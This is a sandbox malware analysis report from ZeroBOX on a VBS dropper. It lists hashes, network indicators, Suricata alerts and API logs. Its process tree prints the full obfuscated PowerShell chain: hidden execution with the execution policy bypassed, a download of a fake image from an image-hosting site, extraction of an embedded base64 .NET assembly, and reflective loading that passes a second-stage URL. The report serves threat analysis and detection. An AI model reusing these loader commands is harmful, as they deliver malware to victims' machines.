popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

xlaexpoittt.vbs

Generic Malware Antivirus PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 28, 2023, 7:05 p.m. Oct. 28, 2023, 7:08 p.m.
Size 107.4KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5 08c5dddd1b41a03887c72314ea20d249
SHA256 1b09ed0d4abe06007e787ae5457a1fc814432ad38df811c861731a0bdc27fcc2
CRC32 4BB539E4
ssdeep 1536:F+5WIWde4Mi3mI2hb7KZ18C2NGkikGkFjGkikGkKEt0eEKU+kCKGWGPrbrbTDDp5:oWIWdeBQZxNj53e
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\xlaexpoittt.vbs

    800

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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CcUzBkdIZQB4ShUWCcUzBkdIE8ShUWCcUzBkdIZgShUWCcUzBkdIoShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdIRgBsShUWCcUzBkdIGEShUWCcUzBkdIZwShUWCcUzBkdIpShUWCcUzBkdIDsShUWCcUzBkdIJShUWCcUzBkdIBzShUWCcUzBkdIHQShUWCcUzBkdIYQByShUWCcUzBkdIHQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBnShUWCcUzBkdIGUShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIwShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBnShUWCcUzBkdIHQShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIrShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBGShUWCcUzBkdIGwShUWCcUzBkdIYQBnShUWCcUzBkdIC4ShUWCcUzBkdITShUWCcUzBkdIBlShUWCcUzBkdIG4ShUWCcUzBkdIZwB0ShUWCcUzBkdIGgShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIGIShUWCcUzBkdIYQBzShUWCcUzBkdIGUShUWCcUzBkdINgShUWCcUzBkdI0ShUWCcUzBkdIEwShUWCcUzBkdIZQBuShUWCcUzBkdIGcShUWCcUzBkdIdShUWCcUzBkdIBoShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIPQShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIcwB0ShUWCcUzBkdIGEShUWCcUzBkdIcgB0ShUWCcUzBkdIEkShUWCcUzBkdIbgBkShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIShUWCcUzBkdI7ShUWCcUzBkdICQShUWCcUzBkdIYgBhShUWCcUzBkdIHMShUWCcUzBkdIZQShUWCcUzBkdI2ShUWCcUzBkdIDQShUWCcUzBkdIQwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIGkShUWCcUzBkdIbQBhShUWCcUzBkdIGcShUWCcUzBkdIZQBUShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIB0ShUWCcUzBkdIC4ShUWCcUzBkdIUwB1ShUWCcUzBkdIGIShUWCcUzBkdIcwB0ShUWCcUzBkdIHIShUWCcUzBkdIaQBuShUWCcUzBkdIGcShUWCcUzBkdIKShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIYgBhShUWCcUzBkdIHMShUWCcUzBkdIZQShUWCcUzBkdI2ShUWCcUzBkdIDQShUWCcUzBkdITShUWCcUzBkdIBlShUWCcUzBkdIG4ShUWCcUzBkdIZwB0ShUWCcUzBkdIGgShUWCcUzBkdIKQShUWCcUzBkdI7ShUWCcUzBkdICQShUWCcUzBkdIYwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBCShUWCcUzBkdIHkShUWCcUzBkdIdShUWCcUzBkdIBlShUWCcUzBkdIHMShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdI9ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIWwBTShUWCcUzBkdIHkShUWCcUzBkdIcwB0ShUWCcUzBkdIGUShUWCcUzBkdIbQShUWCcUzBkdIuShUWCcUzBkdIEMShUWCcUzBkdIbwBuShUWCcUzBkdIHYShUWCcUzBkdIZQByShUWCcUzBkdIHQShUWCcUzBkdIXQShUWCcUzBkdI6ShUWCcUzBkdIDoShUWCcUzBkdIRgByShUWCcUzBkdIG8ShUWCcUzBkdIbQBCShUWCcUzBkdIGEShUWCcUzBkdIcwBlShUWCcUzBkdIDYShUWCcUzBkdINShUWCcUzBkdIBTShUWCcUzBkdIHQShUWCcUzBkdIcgBpShUWCcUzBkdIG4ShUWCcUzBkdIZwShUWCcUzBkdIoShUWCcUzBkdICQShUWCcUzBkdIYgBhShUWCcUzBkdIHMShUWCcUzBkdIZQShUWCcUzBkdI2ShUWCcUzBkdIDQShUWCcUzBkdIQwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIpShUWCcUzBkdIDsShUWCcUzBkdIJShUWCcUzBkdIBsShUWCcUzBkdIG8ShUWCcUzBkdIYQBkShUWCcUzBkdIGUShUWCcUzBkdIZShUWCcUzBkdIBBShUWCcUzBkdIHMShUWCcUzBkdIcwBlShUWCcUzBkdIG0ShUWCcUzBkdIYgBsShUWCcUzBkdIHkShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdI9ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIWwBTShUWCcUzBkdIHkShUWCcUzBkdIcwB0ShUWCcUzBkdIGUShUWCcUzBkdIbQShUWCcUzBkdIuShUWCcUzBkdIFIShUWCcUzBkdIZQBmShUWCcUzBkdIGwShUWCcUzBkdIZQBjShUWCcUzBkdIHQShUWCcUzBkdIaQBvShUWCcUzBkdIG4ShUWCcUzBkdILgBBShUWCcUzBkdIHMShUWCcUzBkdIcwBlShUWCcUzBkdIG0ShUWCcUzBkdIYgBsShUWCcUzBkdIHkShUWCcUzBkdIXQShUWCcUzBkdI6ShUWCcUzBkdIDoShUWCcUzBkdITShUWCcUzBkdIBvShUWCcUzBkdIGEShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIoShUWCcUzBkdICQShUWCcUzBkdIYwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBCShUWCcUzBkdIHkShUWCcUzBkdIdShUWCcUzBkdIBlShUWCcUzBkdIHMShUWCcUzBkdIKQShUWCcUzBkdI7ShUWCcUzBkdICQShUWCcUzBkdIdShUWCcUzBkdIB5ShUWCcUzBkdIHShUWCcUzBkdIShUWCcUzBkdIZQShUWCcUzBkdIgShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIGwShUWCcUzBkdIbwBhShUWCcUzBkdIGQShUWCcUzBkdIZQBkShUWCcUzBkdIEEShUWCcUzBkdIcwBzShUWCcUzBkdIGUShUWCcUzBkdIbQBiShUWCcUzBkdIGwShUWCcUzBkdIeQShUWCcUzBkdIuShUWCcUzBkdIEcShUWCcUzBkdIZQB0ShUWCcUzBkdIFQShUWCcUzBkdIeQBwShUWCcUzBkdIGUShUWCcUzBkdIKShUWCcUzBkdIShUWCcUzBkdInShUWCcUzBkdIEYShUWCcUzBkdIaQBiShUWCcUzBkdIGUShUWCcUzBkdIcgShUWCcUzBkdIuShUWCcUzBkdIEgShUWCcUzBkdIbwBtShUWCcUzBkdIGUShUWCcUzBkdIJwShUWCcUzBkdIpShUWCcUzBkdIDsShUWCcUzBkdIJShUWCcUzBkdIBtShUWCcUzBkdIGUShUWCcUzBkdIdShUWCcUzBkdIBoShUWCcUzBkdIG8ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHQShUWCcUzBkdIeQBwShUWCcUzBkdIGUShUWCcUzBkdILgBHShUWCcUzBkdIGUShUWCcUzBkdIdShUWCcUzBkdIBNShUWCcUzBkdIGUShUWCcUzBkdIdShUWCcUzBkdIBoShUWCcUzBkdIG8ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIoShUWCcUzBkdICcShUWCcUzBkdIVgBBShUWCcUzBkdIEkShUWCcUzBkdIJwShUWCcUzBkdIpShUWCcUzBkdIC4ShUWCcUzBkdISQBuShUWCcUzBkdIHYShUWCcUzBkdIbwBrShUWCcUzBkdIGUShUWCcUzBkdIKShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIG4ShUWCcUzBkdIdQBsShUWCcUzBkdIGwShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdIFsShUWCcUzBkdIbwBiShUWCcUzBkdIGoShUWCcUzBkdIZQBjShUWCcUzBkdIHQShUWCcUzBkdIWwBdShUWCcUzBkdIF0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIoShUWCcUzBkdICcShUWCcUzBkdIZShUWCcUzBkdIBIShUWCcUzBkdIGgShUWCcUzBkdIMShUWCcUzBkdIBMShUWCcUzBkdIGoShUWCcUzBkdIUQShUWCcUzBkdIyShUWCcUzBkdIFoShUWCcUzBkdIWShUWCcUzBkdIBOShUWCcUzBkdIGgShUWCcUzBkdIWQBtShUWCcUzBkdIFYShUWCcUzBkdIcwBhShUWCcUzBkdIFcShUWCcUzBkdIWgBrShUWCcUzBkdIFoShUWCcUzBkdIWShUWCcUzBkdIBSShUWCcUzBkdIGgShUWCcUzBkdIWgBIShUWCcUzBkdIEIShUWCcUzBkdIMQBaShUWCcUzBkdIEcShUWCcUzBkdIbShUWCcUzBkdIB2ShUWCcUzBkdIGMShUWCcUzBkdIbQBSShUWCcUzBkdIGsShUWCcUzBkdIWgBXShUWCcUzBkdIDEShUWCcUzBkdIdShUWCcUzBkdIBZShUWCcUzBkdIFcShUWCcUzBkdIaShUWCcUzBkdIB2ShUWCcUzBkdIGIShUWCcUzBkdIUwShUWCcUzBkdI4ShUWCcUzBkdIDShUWCcUzBkdIShUWCcUzBkdITgB6ShUWCcUzBkdIEUShUWCcUzBkdIdQBOShUWCcUzBkdIHoShUWCcUzBkdITQB1ShUWCcUzBkdIE4ShUWCcUzBkdIRShUWCcUzBkdIBVShUWCcUzBkdIHkShUWCcUzBkdITShUWCcUzBkdIBqShUWCcUzBkdIFUShUWCcUzBkdINShUWCcUzBkdIBNShUWCcUzBkdIFMShUWCcUzBkdIOShUWCcUzBkdIB2ShUWCcUzBkdIE8ShUWCcUzBkdIbgBCShUWCcUzBkdIDShUWCcUzBkdIShUWCcUzBkdIZShUWCcUzBkdIBHShUWCcUzBkdIGcShUWCcUzBkdIPQShUWCcUzBkdInShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICcShUWCcUzBkdIZShUWCcUzBkdIBmShUWCcUzBkdIGQShUWCcUzBkdIZgBkShUWCcUzBkdICcShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIsShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJwBkShUWCcUzBkdIGYShUWCcUzBkdIZShUWCcUzBkdIBmShUWCcUzBkdICcShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIsShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJwBkShUWCcUzBkdIGYShUWCcUzBkdIZShUWCcUzBkdIBmShUWCcUzBkdICcShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIsShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJwBkShUWCcUzBkdIGEShUWCcUzBkdIZShUWCcUzBkdIBzShUWCcUzBkdIGEShUWCcUzBkdIJwShUWCcUzBkdIgShUWCcUzBkdICwShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdInShUWCcUzBkdIGQShUWCcUzBkdIZQShUWCcUzBkdInShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICcShUWCcUzBkdIYwB1ShUWCcUzBkdICcShUWCcUzBkdIKQShUWCcUzBkdIpShUWCcUzBkdIShUWCcUzBkdI==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('ShUWCcUzBkdI','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

      2132

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe.jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

        2228

Name Response Post-Analysis Lookup
apps.identrust.com
A 121.254.136.9
CNAME a1952.dscq.akamai.net
CNAME identrust.edgesuite.net
A 121.254.136.18
23.43.165.105
paste.ee
A 104.21.84.67
A 172.67.187.200
172.67.187.200
uploaddeimagens.com.br
A 104.21.45.138
A 172.67.215.45
104.21.45.138
IP Address Status Action
104.21.84.67 Active Moloch
121.254.136.18 Active Moloch
164.124.101.2 Active Moloch
172.67.215.45 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49161 -> 104.21.84.67:443 2034978 ET POLICY Pastebin-style Service (paste .ee) in TLS SNI Potential Corporate Privacy Violation
TCP 192.168.56.103:49161 -> 104.21.84.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49167 -> 172.67.215.45:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49161
104.21.84.67:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=paste.ee cd:77:4c:26:1f:f8:63:15:43:5a:ba:aa:11:f1:e7:1a:23:3e:4b:15
TLSv1
192.168.56.103:49167
172.67.215.45:443 		C=US, O=Let's Encrypt, CN=E1 CN=uploaddeimagens.com.br d4:47:9f:16:cd:db:0a:99:1e:d8:a8:20:24:9b:c9:bb:4c:62:39:71

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: on was closed: Could not establish trust relationship for the SSL/TLS secure ch
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: annel."
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At line:1 char:177
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: .jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $we
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: bClient.DownloadData <<<< ($imageUrl);$imageText = [System.Text.Encoding]::UTF8
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: .GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_EN
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: D>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexO
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: f($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $st
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: artFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageT
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: ext.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::Fro
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: mBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::L
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: oad($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $typ
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: e.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvc
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: mRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dad
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: sa' , 'de' , 'cu'))
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000fb
1 1 0

